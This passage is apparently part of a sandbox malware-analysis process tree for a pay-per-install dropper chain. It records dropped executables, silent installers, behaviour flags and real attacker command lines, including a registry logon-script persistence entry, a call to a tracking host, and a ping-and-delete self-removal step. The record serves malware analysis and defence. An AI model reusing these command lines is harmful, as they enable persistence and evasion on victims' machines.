                                                                                              5⤵
                                                                                              • Adds Run key to start application
                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                              PID:9864
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                            4⤵
                                                                                              PID:9996
                                                                                              • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                5⤵
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:348
                                                                                                • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                  "{path}"
                                                                                                  6⤵
                                                                                                    PID:5424
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                    "{path}"
                                                                                                    6⤵
                                                                                                      PID:5996
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                      "{path}"
                                                                                                      6⤵
                                                                                                        PID:4712
                                                                                              • C:\Users\Admin\Documents\KdXpfhLTQ3BBgoWVLj7U9y3v.exe
                                                                                                "C:\Users\Admin\Documents\KdXpfhLTQ3BBgoWVLj7U9y3v.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4076
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 660
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:1412
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 664
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1324
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 672
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3288
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 688
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4176
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1176
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4488
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1128
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:4352
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1192
                                                                                                  3⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  • Program crash
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3988
                                                                                              • C:\Users\Admin\Documents\nlf0g47LQydz6aHICGSzAK5U.exe
                                                                                                "C:\Users\Admin\Documents\nlf0g47LQydz6aHICGSzAK5U.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4332
                                                                                                • C:\Users\Admin\Documents\nlf0g47LQydz6aHICGSzAK5U.exe
                                                                                                  "C:\Users\Admin\Documents\nlf0g47LQydz6aHICGSzAK5U.exe" -q
                                                                                                  3⤵
                                                                                                    PID:4752
                                                                                                • C:\Users\Admin\Documents\C8p6WY4rgSY35SGOqyJOVWQv.exe
                                                                                                  "C:\Users\Admin\Documents\C8p6WY4rgSY35SGOqyJOVWQv.exe"
                                                                                                  2⤵
                                                                                                    PID:4608
                                                                                                  • C:\Users\Admin\Documents\VqlG4eaMdZf6UGnUp4gJCuRA.exe
                                                                                                    "C:\Users\Admin\Documents\VqlG4eaMdZf6UGnUp4gJCuRA.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4624
                                                                                                  • C:\Users\Admin\Documents\YKliaHJeiJ_5l1avEzMVfFKQ.exe
                                                                                                    "C:\Users\Admin\Documents\YKliaHJeiJ_5l1avEzMVfFKQ.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1660
                                                                                                  • C:\Users\Admin\Documents\qZYVSjOonAyxSbwXyt7YpsUG.exe
                                                                                                    "C:\Users\Admin\Documents\qZYVSjOonAyxSbwXyt7YpsUG.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4540
                                                                                                    • C:\Users\Admin\Documents\qZYVSjOonAyxSbwXyt7YpsUG.exe
                                                                                                      "C:\Users\Admin\Documents\qZYVSjOonAyxSbwXyt7YpsUG.exe"
                                                                                                      3⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:9984
                                                                                                  • C:\Users\Admin\Documents\es0CMIl9agW6vIuu4OFL59GL.exe
                                                                                                    "C:\Users\Admin\Documents\es0CMIl9agW6vIuu4OFL59GL.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4552
                                                                                                  • C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe
                                                                                                    "C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:4760
                                                                                                    • C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe
                                                                                                      C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:476
                                                                                                    • C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe
                                                                                                      C:\Users\Admin\Documents\UzU1aE0pfbqarCVa7XvdCz0i.exe
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4616
                                                                                                  • C:\Users\Admin\Documents\C9EtuPtr5uw_Xo6Wkbx2vlt1.exe
                                                                                                    "C:\Users\Admin\Documents\C9EtuPtr5uw_Xo6Wkbx2vlt1.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4748
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-U7MV6.tmp\C9EtuPtr5uw_Xo6Wkbx2vlt1.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-U7MV6.tmp\C9EtuPtr5uw_Xo6Wkbx2vlt1.tmp" /SL5="$10248,138429,56832,C:\Users\Admin\Documents\C9EtuPtr5uw_Xo6Wkbx2vlt1.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:4200
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-64CQ3.tmp\Setup.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-64CQ3.tmp\Setup.exe" /Verysilent
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in Program Files directory
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:4608
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4208
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 760
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:5588
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 784
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:1328
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 828
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Program crash
                                                                                                            PID:4752
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 840
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:7744
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 956
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:7248
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 1092
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:5240
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 1116
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:7304
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 1080
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:1428
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4660
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-IT6JE.tmp\Inlog.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-IT6JE.tmp\Inlog.tmp" /SL5="$401A8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                            6⤵
                                                                                                              PID:5144
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-PURTG.tmp\Setup.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-PURTG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                7⤵
                                                                                                                  PID:6584
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-B3QSV.tmp\Setup.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-B3QSV.tmp\Setup.tmp" /SL5="$1041C,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-PURTG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                    8⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    PID:424
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-L9OBM.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                      9⤵
                                                                                                                        PID:6860
                                                                                                                        • C:\Windows\SysWOW64\expand.exe
                                                                                                                          expand C:\Users\Admin\AppData\Local\Temp\is-L9OBM.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                          10⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          PID:6160
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                        9⤵
                                                                                                                          PID:1892
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                            10⤵
                                                                                                                              PID:4760
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                            9⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            PID:8900
                                                                                                                          • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                            "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                            9⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:7856
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-L9OBM.tmp\{app}\vdi_compiler.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-L9OBM.tmp\{app}\vdi_compiler"
                                                                                                                            9⤵
                                                                                                                              PID:5880
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-L9OBM.tmp\{app}\vdi_compiler.exe"
                                                                                                                                10⤵
                                                                                                                                  PID:4476
                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                    ping localhost -n 4
                                                                                                                                    11⤵
                                                                                                                                    • Runs ping.exe
                                                                                                                                    PID:7284
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Enumerates connected drives
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        PID:1156
                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289458 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                          6⤵
                                                                                                                            PID:8308
                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                          5⤵
                                                                                                                            PID:2776
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-12TN2.tmp\WEATHER Manager.tmp
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-12TN2.tmp\WEATHER Manager.tmp" /SL5="$102F4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:5244
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-OH5DA.tmp\Setup.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-OH5DA.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                7⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Modifies system certificate store
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                PID:6920
                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-OH5DA.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-OH5DA.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289458 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                  8⤵
                                                                                                                                    PID:9140
                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1908
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-RCIDM.tmp\VPN.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-RCIDM.tmp\VPN.tmp" /SL5="$10302,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                6⤵
                                                                                                                                  PID:5280
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-3KI04.tmp\Setup.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-3KI04.tmp\Setup.exe" /silent /subid=720
                                                                                                                                    7⤵
                                                                                                                                      PID:5500
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-49LJ4.tmp\Setup.tmp
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-49LJ4.tmp\Setup.tmp" /SL5="$202FA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-3KI04.tmp\Setup.exe" /silent /subid=720
                                                                                                                                        8⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        • Modifies registry class
                                                                                                                                        • Modifies system certificate store
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        PID:904
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                          9⤵
                                                                                                                                            PID:636
                                                                                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                              tapinstall.exe remove tap0901
                                                                                                                                              10⤵
                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                              PID:7504
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                            9⤵
                                                                                                                                              PID:6512
                                                                                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                10⤵
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                PID:8528
                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                              9⤵
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:2196
                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                              9⤵
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:1804
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      PID:200
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5168
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-RIBLS.tmp\MediaBurner2.tmp
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-RIBLS.tmp\MediaBurner2.tmp" /SL5="$10318,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:5420
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-T83UN.tmp\3377047_logo_media.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-T83UN.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                                          7⤵
                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          PID:6028
                                                                                                                                          • C:\Program Files\Google\JFMFFSMFKE\ultramediaburner.exe
                                                                                                                                            "C:\Program Files\Google\JFMFFSMFKE\ultramediaburner.exe" /VERYSILENT
                                                                                                                                            8⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            PID:5280
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-G3RH1.tmp\ultramediaburner.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-G3RH1.tmp\ultramediaburner.tmp" /SL5="$20408,281924,62464,C:\Program Files\Google\JFMFFSMFKE\ultramediaburner.exe" /VERYSILENT
                                                                                                                                              9⤵
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              PID:7620
                                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                10⤵
                                                                                                                                                  PID:1560
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\aa-8a723-e51-6d892-daac2092d0904\Befaetesebae.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\aa-8a723-e51-6d892-daac2092d0904\Befaetesebae.exe"
                                                                                                                                              8⤵
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:6644
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\49-b5933-e29-adca5-9143351f45cfe\SHykanewaegu.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\49-b5933-e29-adca5-9143351f45cfe\SHykanewaegu.exe"
                                                                                                                                              8⤵
                                                                                                                                                PID:4548
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wblvt40c.l4d\GcleanerEU.exe /eufive & exit
                                                                                                                                                  9⤵
                                                                                                                                                    PID:8332
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\wblvt40c.l4d\GcleanerEU.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\wblvt40c.l4d\GcleanerEU.exe /eufive
                                                                                                                                                      10⤵
                                                                                                                                                        PID:8824
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fheosjjj.ezz\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                      9⤵
                                                                                                                                                        PID:8844
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\fheosjjj.ezz\installer.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\fheosjjj.ezz\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                          10⤵
                                                                                                                                                            PID:8444
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oe2j44im.1gq\ufgaa.exe & exit
                                                                                                                                                          9⤵
                                                                                                                                                            PID:8208
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\juxw1he4.a0e\anyname.exe & exit
                                                                                                                                                            9⤵
                                                                                                                                                              PID:6416
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                10⤵
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                PID:9020
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\juxw1he4.a0e\anyname.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\juxw1he4.a0e\anyname.exe
                                                                                                                                                                10⤵
                                                                                                                                                                  PID:8304
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\juxw1he4.a0e\anyname.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\juxw1he4.a0e\anyname.exe" -q
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:8504
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aftqiqdp.cqr\gcleaner.exe /mixfive & exit
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:8580
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\aftqiqdp.cqr\gcleaner.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\aftqiqdp.cqr\gcleaner.exe /mixfive
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:8792
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qdedwpfr.fig\autosubplayer.exe /S & exit
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:8996
                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                              5⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5220
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\7375177.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\7375177.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5464
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4208968.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4208968.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                PID:4220
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4627678.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4627678.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:732
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4348747.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4348747.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:5920
                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:1412
                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5380
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpE829_tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\tmpE829_tmp.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:6780
                                                                                                                                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                      "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:6228
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
